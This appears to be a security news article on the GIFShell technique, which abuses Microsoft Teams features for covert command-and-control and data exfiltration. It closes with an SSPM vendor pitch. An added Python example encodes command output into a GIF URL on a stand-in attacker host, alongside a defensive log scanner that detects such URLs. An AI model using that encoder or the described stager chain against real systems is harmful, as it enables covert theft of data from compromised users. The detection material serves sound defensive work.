
A newly published attack technique against Microsoft Teams is a textbook case of how permissive configuration and legitimate product features can hand threat actors a covert channel.

Developed by security researcher Bobby Rauch, the GIFShell technique targets users or devices that are already compromised. It chains several Microsoft Teams features into a command-and-control (C&C) channel for malware and exfiltrates data inside GIFs, so the traffic looks like ordinary Teams activity to EDR and other network monitoring tools.

The attack has several stages. First, using a phishing-style lure, the attacker must convince the user to install a malicious stager. That stager executes commands and returns their output to a Microsoft Teams webhook in the form of a GIF URL.

“I realised that while compelling, the attack chain relies on a dropper being downloaded and run on a victim’s machine,” Rauch said.

After setting up their own Microsoft Teams tenant, the threat actor contacts Teams users in other organizations, which works because external access is enabled by default. Using the GIFShell Python script, the actor sends the target a message containing a specially crafted GIF that has been modified to carry base64-encoded commands for the target's computer.

When the message arrives, the Teams client writes it, GIF included, to its local logs on the victim's machine, and those logs are readable by any process running as the user. The user does not have to open the GIF: the stager reads the commands from the log.

The stager polls the Teams logs, and whenever it finds one of these GIFs it extracts the embedded commands and executes them. It then base64-encodes the command output and uses it as the filename of a GIF URL that points at the attacker's server, submitting that URL back through Teams. Because Microsoft's servers fetch the GIF in order to render it, the connection to the attacker's server originates from Microsoft's infrastructure rather than from the victim's machine. The GIFShell server listening there receives the request, decodes the filename, and shows the attacker the output of the command run on the victim's device.
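The exfiltration step above, as an added example (not Rauch's GIFShell code): a stager-side encoder that packs command output into a GIF filename, the matching decoder an attacker's server or an analyst would use, and a defender-side check that scans outbound-request log lines for GIF URLs whose filename base64-decodes to readable text. The host c2.example.test, the log line format, and the sample lines are all constructed for this illustration.

```python
import base64
import re
from urllib.parse import urlparse

# Constructed illustration of the GIFShell exfiltration encoding plus a check a
# defender can run over outbound-request logs. Not GIFShell's own code; the host
# c2.example.test and the log format below are placeholders.

C2_HOST = "c2.example.test"


def encode_exfil_url(command_output: bytes, host: str = C2_HOST) -> str:
    """Stager side: pack command output into the filename of a GIF URL.

    URL-safe base64 with padding stripped keeps the filename a valid path
    component. Teams fetches this URL to render the GIF, so the request to the
    attacker's server comes from Microsoft's infrastructure, not the victim.
    """
    token = base64.urlsafe_b64encode(command_output).decode("ascii").rstrip("=")
    return f"https://{host}/{token}.gif"


def decode_exfil_url(url: str) -> bytes:
    """Attacker (or analyst) side: recover the payload from a GIF filename."""
    name = urlparse(url).path.rsplit("/", 1)[-1]
    token = name[:-4] if name.endswith(".gif") else name
    token += "=" * (-len(token) % 4)          # restore the stripped padding
    return base64.urlsafe_b64decode(token)


# A GIF whose filename is a long run of base64url characters deserves a look.
B64_GIF_URL = re.compile(r"https?://[^\s\"']+/[A-Za-z0-9_-]{16,}\.gif")


def printable_ratio(data: bytes) -> float:
    """Fraction of bytes that are printable ASCII or tab/CR/LF."""
    if not data:
        return 0.0
    ok = sum(1 for b in data if 32 <= b < 127 or b in (9, 10, 13))
    return ok / len(data)


def suspicious_gif_urls(log_lines, min_ratio: float = 0.9):
    """Defender side: return (url, decoded_text) for every GIF URL whose
    filename decodes to mostly readable text, i.e. likely command output.
    Random CDN identifiers decode to binary noise and are filtered out."""
    hits = []
    for line in log_lines:
        for match in B64_GIF_URL.finditer(line):
            url = match.group(0)
            try:
                payload = decode_exfil_url(url)
            except ValueError:                 # not valid base64 after all
                continue
            if printable_ratio(payload) >= min_ratio:
                hits.append((url, payload.decode("ascii", errors="replace")))
    return hits


# Constructed sample log: a benign short-name GIF, a benign long CDN id that
# decodes to binary, and one GIF carrying the output of `whoami`.
EXFIL_URL = encode_exfil_url(b"corp\\victim\r\n")
SAMPLE_LOG = [
    "2022-09-08T10:01:12Z teams-fetch GET https://media.tenor.com/abc/tenor.gif 200",
    "2022-09-08T10:01:12Z teams-fetch GET https://cdn.example.test/AAAAAAAAAAAAAAAAAAAAAAAA.gif 200",
    f"2022-09-08T10:01:13Z teams-fetch GET {EXFIL_URL} 200",
]

if __name__ == "__main__":
    for url, text in suspicious_gif_urls(SAMPLE_LOG):
        print(f"{url}\n  decodes to: {text!r}")
```

The printable-ratio filter is what keeps the check usable: legitimate GIF CDNs also use long opaque filenames, but those decode to binary noise, whereas exfiltrated shell output decodes to text. In a real deployment the regex would run over proxy or EDR network telemetry rather than the constructed lines here.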

Lawrence Abrams of BleepingComputer reported that Microsoft has acknowledged the technique but does not plan an immediate fix, because it does not consider any security boundary to have been bypassed.

Microsoft said, “It does not meet the bar for an urgent security fix…may take action in a future release to help mitigate this technique.”

Until then, mitigation falls to tenant administrators: tightening the Teams external-access (federation) settings so that unknown outside tenants cannot message users, and watching endpoints for a stager that reads the Teams client logs.

Misconfigurations of this kind can be prevented, and security settings strengthened, either through manual detection and remediation or through an automated SaaS Security Posture Management (SSPM) service. Given the number of configurations, users, devices, and new threats involved, the manual approach is an unsustainable drain that overwhelms security teams, whereas an SSPM solution such as Adaptive Shield gives them full control over their SaaS applications and their settings.
